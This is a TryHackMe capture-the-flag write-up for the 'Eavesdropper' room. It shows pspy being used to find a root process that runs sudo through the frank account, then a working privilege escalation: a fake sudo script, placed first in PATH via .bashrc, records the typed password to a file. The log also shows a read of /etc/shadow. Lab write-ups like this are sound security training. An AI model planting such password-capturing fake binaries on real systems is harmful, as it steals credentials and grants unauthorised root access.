Eavesdropper - Write-up - TryHackMe

Information

Room#

  • Name: Eavesdropper
  • Profile: tryhackme.com
  • Difficulty: Medium
  • Description: Listen closely, you might hear a password!

Eavesdropper

Write-up

Overview#

Foothold#

Connect to SSH and upload pspy as we have to observe what's going on on the system, expecting a root cron job.

$ ssh frank@10.10.210.234 -i idrsa.id-rsa
$ scp -i idrsa.id-rsa pspy64 frank@10.10.210.234:pspy

Then we make it executable and run it.

frank@workstation:~$ chmod +x pspy
frank@workstation:~$ ./pspy

Look at the logs:

2023/02/04 12:01:55 CMD: UID=1000  PID=1413   | sshd: frank@pts/1
2023/02/04 12:01:56 CMD: UID=1000  PID=1414   | sshd: frank@pts/1
2023/02/04 12:01:57 CMD: UID=1000  PID=1415   | sshd: frank@pts/1
2023/02/04 12:01:58 CMD: UID=1000  PID=1416   | sshd: frank@pts/1
2023/02/04 12:01:58 CMD: UID=1000  PID=1417   | /bin/sh /usr/sbin/service --status-all
2023/02/04 12:01:58 CMD: UID=1000  PID=1418   | /bin/sh /usr/sbin/service --status-all
2023/02/04 12:01:58 CMD: UID=1000  PID=1419   | /bin/sh /usr/sbin/service --status-all
2023/02/04 12:01:58 CMD: UID=1000  PID=1420   | /bin/sh /etc/init.d/dbus status
2023/02/04 12:01:58 CMD: UID=1000  PID=1422   | /bin/sh /usr/sbin/service --status-all
2023/02/04 12:01:58 CMD: UID=1000  PID=1421   | /bin/sh /usr/sbin/service --status-all
2023/02/04 12:01:58 CMD: UID=1000  PID=1423   | /bin/sh /usr/sbin/service --status-all
2023/02/04 12:01:58 CMD: UID=1000  PID=1424   | /bin/sh /etc/init.d/hwclock.sh status
2023/02/04 12:01:58 CMD: UID=1000  PID=1426   | /bin/sh /usr/sbin/service --status-all
2023/02/04 12:01:58 CMD: UID=1000  PID=1425   | /bin/sh /usr/sbin/service --status-all
2023/02/04 12:01:58 CMD: UID=1000  PID=1427   | /bin/sh /usr/sbin/service --status-all
2023/02/04 12:01:58 CMD: UID=1000  PID=1428   | /bin/sh /etc/init.d/procps status
2023/02/04 12:01:58 CMD: UID=1000  PID=1429   | /bin/sh /etc/init.d/procps status
2023/02/04 12:01:58 CMD: UID=1000  PID=1430   | /bin/sh /etc/init.d/procps status
2023/02/04 12:01:58 CMD: UID=1000  PID=1431   | /bin/sh /etc/init.d/procps status
2023/02/04 12:01:58 CMD: UID=1000  PID=1433   | /bin/sh /usr/sbin/service --status-all
2023/02/04 12:01:58 CMD: UID=1000  PID=1432   | /bin/sh /usr/sbin/service --status-all
2023/02/04 12:01:58 CMD: UID=1000  PID=1434   | /bin/sh /usr/sbin/service --status-all
2023/02/04 12:01:58 CMD: UID=1000  PID=1437   | /bin/sh /etc/init.d/ssh status
2023/02/04 12:01:58 CMD: UID=1000  PID=1436   | /bin/sh /etc/init.d/ssh status
2023/02/04 12:01:58 CMD: UID=1000  PID=1435   | /bin/sh /etc/init.d/ssh status
2023/02/04 12:01:58 CMD: UID=1000  PID=1438   | /bin/sh /etc/init.d/ssh status
2023/02/04 12:01:58 CMD: UID=1000  PID=1439   | /bin/sh /etc/init.d/ssh status
2023/02/04 12:01:58 CMD: UID=1000  PID=1440   | /bin/sh /etc/init.d/ssh status
2023/02/04 12:01:58 CMD: UID=1000  PID=1442   | /bin/sh /usr/sbin/service --status-all
2023/02/04 12:01:58 CMD: UID=1000  PID=1441   | /bin/sh /usr/sbin/service --status-all
2023/02/04 12:01:59 CMD: UID=1000  PID=1443   | sshd: frank@pts/1
2023/02/04 12:02:00 CMD: UID=1000  PID=1444   | sshd: frank@pts/1
2023/02/04 12:02:00 CMD: UID=0     PID=1445   | sudo cat /etc/shadow
2023/02/04 12:02:20 CMD: UID=0     PID=1446   | sshd: [accepted]
2023/02/04 12:02:20 CMD: UID=0     PID=1447   | sshd: [accepted]
2023/02/04 12:02:20 CMD: UID=0     PID=1448   | sshd: frank [priv]
2023/02/04 12:02:20 CMD: UID=0     PID=1449   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2023/02/04 12:02:20 CMD: UID=0     PID=1450   | run-parts --lsbsysinit /etc/update-motd.d
2023/02/04 12:02:20 CMD: UID=0     PID=1451   | /bin/sh /etc/update-motd.d/00-header
2023/02/04 12:02:20 CMD: UID=0     PID=1452   | /bin/sh /etc/update-motd.d/00-header
2023/02/04 12:02:20 CMD: UID=0     PID=1453   | /bin/sh /etc/update-motd.d/00-header
2023/02/04 12:02:20 CMD: UID=0     PID=1454   | run-parts --lsbsysinit /etc/update-motd.d
2023/02/04 12:02:20 CMD: UID=0     PID=1455   | run-parts --lsbsysinit /etc/update-motd.d
2023/02/04 12:02:20 CMD: UID=0     PID=1456   | run-parts --lsbsysinit /etc/update-motd.d
2023/02/04 12:02:20 CMD: UID=0     PID=1457   | sshd: frank [priv]

This is weird, why root would use sudo? Looks like root is connecting through SSH to frank account. There is probably a cron job executing sudo in a unattended way so we'll be able to capture root password by capturing the intput. To do so we just have to change frank's PATH so a rogue sudo command would be executed.

Elevation of privilege (EoP)#

So let's prepare sudo hijacking.

frank@workstation:~$ mkdir bin
frank@workstation:~$ vim bin/sudo

The content of the fake sudo will read the input to capture root password.

#!/bin/bash
read -p "noraj" password
echo $password > /home/frank/pass.txt

Then we change frank's PATH so that the fake sudo will be loaded before the real one.

frank@workstation:~$ chmod +x bin/sudo
frank@workstation:~$ vim .bashrc

At the top:

export PATH=/home/frank/bin:$PATH
frank@workstation:~$ cat pass.txt
EDITED
frank@workstation:~$ sudo bash
[sudo] password for frank:
root@workstation:/home/frank# cd
root@workstation:~# cat flag.txt
flag{EDITED}
Share